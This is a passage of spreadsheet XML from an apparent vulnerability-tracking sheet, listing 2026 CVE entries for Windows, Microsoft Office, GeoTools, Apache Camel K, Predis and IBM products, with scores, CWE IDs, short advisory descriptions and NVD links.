        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69829</t>
        </is>
      </c>
      <c r="C85" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E85" s="5" t="inlineStr"/>
      <c r="F85" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G85" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="C86" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E86" s="5" t="inlineStr"/>
      <c r="F86" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G86" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H86" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I86" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="C87" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E87" s="5" t="inlineStr"/>
      <c r="F87" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G87" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="C88" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G88" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="C89" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G89" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72982</t>
        </is>
      </c>
      <c r="C90" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G90" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72983</t>
        </is>
      </c>
      <c r="C91" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E91" s="5" t="inlineStr"/>
      <c r="F91" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G91" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="C92" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E92" s="5" t="inlineStr"/>
      <c r="F92" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G92" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="C93" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E93" s="5" t="inlineStr"/>
      <c r="F93" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G93" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="C94" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E94" s="5" t="inlineStr"/>
      <c r="F94" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G94" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76904</t>
        </is>
      </c>
      <c r="C95" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E95" s="5" t="inlineStr"/>
      <c r="F95" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G95" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>GeoTools is an open source Java library that provides tools for geospatial data. Starting in version 30.5 and prior to versions 33.6, 34.5, and 33.6, an SQL Injection Vulnerability is present when executing OGC Filters with PostGIS DataStore implementation: `jsonArrayContains` function; Requires PostGIS 12 or greater with a String or JSON field. For PostGIS 12 and greater `jsonArrayContains(&lt;column&gt;, &lt;pointer&gt;, &lt;value&gt;)` function writes `&lt;value&gt;` into generated SQL without escaping. Patches are available in versions 33.6, 34.5, and 33.6. No known workaround is available. To limit scope of SQL Injection the PostGIS connection pool should be configured with limited rights.</t>
        </is>
      </c>
      <c r="M95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76904</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77493</t>
        </is>
      </c>
      <c r="C96" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E96" s="5" t="inlineStr"/>
      <c r="F96" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G96" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H9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6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="C97" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E97" s="5" t="inlineStr"/>
      <c r="F97" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G97" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78509</t>
        </is>
      </c>
      <c r="C98" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E98" s="5" t="inlineStr"/>
      <c r="F98" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G98" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H98" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I98" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L98" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78509</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78510</t>
        </is>
      </c>
      <c r="C99" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E99" s="5" t="inlineStr"/>
      <c r="F99" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G99" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H99" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78510</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78573</t>
        </is>
      </c>
      <c r="C100" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E100" s="5" t="inlineStr"/>
      <c r="F100" s="5" t="inlineStr"/>
      <c r="G100" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway 1.0.0 through 1.0.7 could allow a remote attacker to gain administrative access due to the use of default credentials.</t>
        </is>
      </c>
      <c r="M100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78573</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79724</t>
        </is>
      </c>
      <c r="C101" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E101" s="5" t="inlineStr"/>
      <c r="F101" s="5" t="inlineStr"/>
      <c r="G101" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L101" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary OS commands due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="M101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79724</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80351</t>
        </is>
      </c>
      <c r="C102" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E102" s="5" t="inlineStr"/>
      <c r="F102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G102" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L102" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of directives in dynamically evaluated code ('eval injection') vulnerability in Apache Camel K.
An improper neutralization of directives in dynamically evaluated Maven configuration allows tenant-controlled repository content to influence code execution within the operator pod, potentially enabling tenants to execute arbitrary code with the privileges of the operator.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80351</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80352</t>
        </is>
      </c>
      <c r="C103" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E103" s="5" t="inlineStr"/>
      <c r="F103" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G103" s="5" t="inlineStr">
        <is>
          <t>apache, kubernetes</t>
        </is>
      </c>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L103" s="5" t="inlineStr">
        <is>
          <t>Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Camel K.
A YAML injection vulnerability in custom resource configuration allows an authorized CR author to inject arbitrary Kubernetes objects, potentially enabling unauthorized resource creation with the privileges of the operator.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80352</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81204</t>
        </is>
      </c>
      <c r="C104" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E104" s="5" t="inlineStr"/>
      <c r="F104" s="5" t="inlineStr"/>
      <c r="G104" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote attacker to execute arbitrary code due to code injection during graph construction.</t>
        </is>
      </c>
      <c r="M104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81204</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="C105" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E105" s="5" t="inlineStr"/>
      <c r="F105" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G105" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr">
        <is>
          <t>Predis is a flexible and feature-complete Redis and Valkey client for PHP. From version 3.0.0-RC1 until version 3.3.0, pipeline handling on aggregate cluster and replication connections reparses an already serialized RESP buffer in AbstractAggregateConnection::write() by splitting it with explode("\r\n") instead of honoring RESP length prefixes. Attacker-controlled keys or values containing CRLF sequences can therefore be interpreted by Command::deserializeCommand() as additional commands. On cluster connections, ClusterStrategy::getFakeKey() can route injected keyless commands using the literal fake key value "key", permitting operations such as shard-wide cache deletion, targeted data modification, data reads, or node disruption. On replication connections, malformed reparsing can throw an uncaught exception and repeatedly terminate affected requests. Only pipeline() reaches this vulnerable path; transaction() and MULTI are not affected. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="M105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85025</t>
        </is>
      </c>
      <c r="C106" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E106" s="5" t="inlineStr"/>
      <c r="F106" s="5" t="inlineStr"/>
      <c r="G106" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L106"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M106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85025</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19274</t>
        </is>
      </c>
      <c r="C107" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E107" s="5" t="inlineStr"/>
      <c r="F107" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G107" s="5" t="inlineStr">
        <is>
          <t>ibm, kubernetes</t>
        </is>
      </c>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L107" s="5" t="inlineStr">
        <is>
